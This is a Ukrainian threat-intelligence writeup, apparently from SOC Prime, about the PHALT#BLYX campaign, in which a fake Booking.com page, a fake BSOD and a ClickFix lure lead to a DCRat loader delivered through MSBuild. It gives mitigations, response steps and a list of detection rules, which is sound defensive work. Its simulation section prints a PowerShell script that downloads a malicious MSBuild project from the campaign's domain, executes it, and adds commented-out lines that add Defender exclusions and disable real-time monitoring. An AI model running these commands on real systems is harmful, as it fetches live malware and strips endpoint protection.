SOC Prime Bias: Середній

06 Jan 2026 16:06 UTC

Аналіз PHALT#BLYX: Фальшиві BSOD та надійні інструменти збірки в ланцюгах шкідливих програм

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
Аналіз PHALT#BLYX: Фальшиві BSOD та надійні інструменти збірки в ланцюгах шкідливих програм
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Звіт деталізує багатоступеневий ланцюг вторгнення, що впливає на сектор гостинності, поєднуючи підроблену сторінку Booking.com, оманливу анімацію в стилі синього екрану та підказку у стилі ClickFix для тих, щоб переконати користувачів виконати PowerShell dropper. Цей dropper отримує файл проекту MSBuild, який запускає спеціальний завантажувач DCRat. Завантажувач змінює налаштування Windows Defender, встановлює стійкість за допомогою ярлика Startup .url і інжектує своє навантаження в легітимні процеси. Використовуючи інструменти, що містяться у системі, такі як PowerShell і MSBuild.exe, операції зменшують очевидні сліди шкідливого програмного забезпечення. Артефакти російської мови в ланцюзі також відзначені як натяк на авторів.

Розслідування

Дослідники Securonix відстежили потік від фішинг-електронних листів, які пропонують посилання на «скасування бронювання» на шкідливий домен, потім на однорядкову команду PowerShell, яка знаходить msbuild.exe, завантажує файл v.proj і виконує його. Проект v.proj виконує декілька дій: додає виключення для Windows Defender, завантажує staxs.exe (варіант DCRat), створює вказівний ярлик Startup .url для стійкості та підключається до інфраструктури командування та контролю через порт 3535. Завантажувач потім стискає та інжектує фінальну стадію в aspnet_compiler.exe, використовуючи метод hollowing для потоку нормальної діяльності.

Пом’якшення наслідків

Зменшіть вплив, навчаючи користувачів розпізнавати підказки у стилі ClickFix та соціальну інженерію «запустіть цю команду для виправлення». Моніторте та обмежуйте виконання MSBuild.exe, особливо коли виконується з незвичних шляхів або користувацьких робочих процесів, і увімкніть журналювання блоків скриптів PowerShell для кращої видимості. Додайте виявлення для створення ярликів .url в папці Startup та для змін у виключеннях Windows Defender. На мережевому рівні заблокуйте вихідний трафік на визначені шкідливі домени та явно обмежте або попереджайте про підозрілі виходи на TCP/3535, де це не потрібно.

Відповідь

Якщо активність виявлена, ізолюйте хост і збережіть ключові артефакти, включаючи v.proj, staxs.exe та будь-які файли Startup .url. Видаліть неавторизовані виключення Defender, припиніть шкідливі чи інжектовані процеси та заблокуйте пов’язані домени/IP C2 — особливо будь-яке спілкування через порт 3535. Скиньте потенційно скомпрометовані облікові дані, виконайте повне сканування на наявність шкідливих програм та перевірте середовище на аналогічні схеми виконання через MSBuild та команди PowerShell. Нарешті, розгорніть виявлення, інформовані загрозами, що зосереджені на зловживанні MSBuild, поведінці ClickFix та стійкості через ярлики Startup для запобігання рецидивам.

Потік атаки

Виявлення

Завантаження або Передача через Powershell (через командний рядок)

Команда SOC Prime
06 січня 2026

Підозрілі зміни налаштувань Windows Defender (через powershell)

Команда SOC Prime
06 січня 2026

Можливі точки стійкості [ASEPs – Реєстр програмного забезпечення/NTUSER Hive] (через подію реєстру)

Команда SOC Prime
06 січня 2026

Підозрілі бінарні/скрипти у локації автозапуску (через подію файлу)

Команда SOC Prime
06 січня 2026

IOC (HashSha512) для виявлення: Аналіз PHALT#BLYX: Як фейкові BSOD та довірені інструменти зборки використовуються для створення зараження шкідливим ПЗ

Правила AI SOC Prime
06 січня 2026

IOC (SourceIP) для виявлення: Аналіз PHALT#BLYX: Як фейкові BSOD та довірені інструменти зборки використовуються для створення зараження шкідливим ПЗ

Правила AI SOC Prime
06 січня 2026

IOC (HashSha256) для виявлення: Аналіз PHALT#BLYX: Як фейкові BSOD та довірені інструменти зборки використовуються для створення зараження шкідливим ПЗ

Правила AI SOC Prime
06 січня 2026

IOC (DestinationIP) для виявлення: Аналіз PHALT#BLYX: Як фейкові BSOD та довірені інструменти зборки використовуються для створення зараження шкідливим ПЗ

Правила AI SOC Prime
06 січня 2026

PHALT#BLYX Виконання зловмисного ПЗ через MSBuild та Hollowing процесів [Створення процесу Windows]

Правила AI SOC Prime
06 січня 2026

PHALT#BLYX Кампанія шкідливого ПЗ за допомогою PowerShell та MSBuild для зараження [Powershell Windows]

Правила AI SOC Prime
06 січня 2026

Імітаційне виконання

Передумова: Перевірка телеметрії та базової лінії повинна бути успішною.

Обґрунтування: Цей розділ деталізує точне виконання техніки противника (TTP), призначене для тригера правил виявлення. Команди і наратив прямо відображують ідентифіковані TTP і мають на меті генерувати точну телеметрію, очікувану логікою виявлення.

  • Опис атаки та команди:
    Актор загрози відкриває сесію PowerShell на зараженій кінцевій точці. Спочатку знаходять msbuild.exe , потім завантажують зловмисний проект MSBuild (v.proj) до C:ProgramData. Зловмисник негайно викликає msbuild.exe для виконання навантаження, яке скидає другий етап. Нарешті, вони змінюють налаштування Windows Defender, додаючи виключення і відключаючи моніторинг у реальному часі для забезпечення стійкості.

  • Скрипт регресійного тестування:

    # Скрипт симуляції PHALT#BLYX – відтворює активність, яка викликає тригер виявлення
    # --------------------------------------------------------------
    # 1. Знаходження msbuild.exe
    $msb = (Get-ChildItem -Path C: -Filter msbuild.exe -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1).FullName
    
    # 2. Завантаження зловмисного проекту MSBuild до ProgramData
    $projUrl = "https://2fa-bns.com/v.proj"
    $dest    = "$env:ProgramDatav.proj"
    Invoke-WebRequest -Uri $projUrl -OutFile $dest
    
    # 3. Виконання проекту з msbuild.exe
    & $msb $dest
    
    # 4. Зміна налаштувань Windows Defender (будь-яка з нижчезазначених буде задовольняти правило)
    #    Розкоментуйте потрібні рядки для симуляції дій зловмисника.
    
    # Додати шлях до виключення
    # Add-MpPreference -ExclusionPath "$env:ProgramData"
    
    # Додати виключення для .exe файлів
    # Add-MpPreference -ExclusionExtension ".exe"
    
    # Додати виключення для .ps1 файлів
    # Add-MpPreference -ExclusionExtension ".ps1"
    
    # Вимкнути моніторинг у реальному часі
    # Set-MpPreference -DisableRealtimeMonitoring $true
  • Команди прибирання:

    # Видалити завантажений файл проекту
    Remove-Item -Path "$env:ProgramDatav.proj" -Force -ErrorAction SilentlyContinue
    
    # Відновити моніторинг у реальному часі Windows Defender (якщо він був вимкнений)
    Set-MpPreference -DisableRealtimeMonitoring $false
    
    # Видалити будь-які додані виключення (приклад для виключення шляхів)
    Remove-MpPreference -ExclusionPath "$env:ProgramData"
    
    # За бажанням видалити всі залишкові файли, створені навантаженням
    # Remove-Item -Path "C:ProgramDatamalicious_payload.exe" -Force -ErrorAction SilentlyContinue